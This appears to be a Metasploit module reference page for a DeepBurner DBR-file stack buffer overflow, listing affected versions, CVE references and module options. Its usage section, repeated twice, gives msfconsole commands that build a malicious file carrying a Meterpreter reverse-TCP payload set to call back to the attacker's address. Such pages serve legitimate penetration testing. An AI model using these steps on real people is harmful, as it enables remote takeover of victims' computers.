AstonSoft DeepBurner (DBR File) Path Buffer Overflow
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extention is registered to DeepBurner.
Exploit Rank
- Great
Exploit Authors
- Expanders < >
- fl0 fl0w < >
- jduck < jduck [at] metasploit.com >
Vulnerability References
- BID-21657
- OSVDB-32356
- CVE-2006-6665
- http://milw0rm.com/exploits/2950
- http://milw0rm.com/exploits/8335
- EDB-11315
Exploit Targets
- 0 - Windows Universal (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/deepburner_path
msf exploit(deepburner_path) > show payloads
msf exploit(deepburner_path) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(deepburner_path) > set LHOST [MY IP ADDRESS]
msf exploit(deepburner_path) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/deepburner_path
msf exploit(deepburner_path) > show payloads
msf exploit(deepburner_path) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(deepburner_path) > set LHOST [MY IP ADDRESS]
msf exploit(deepburner_path) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.dbr) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
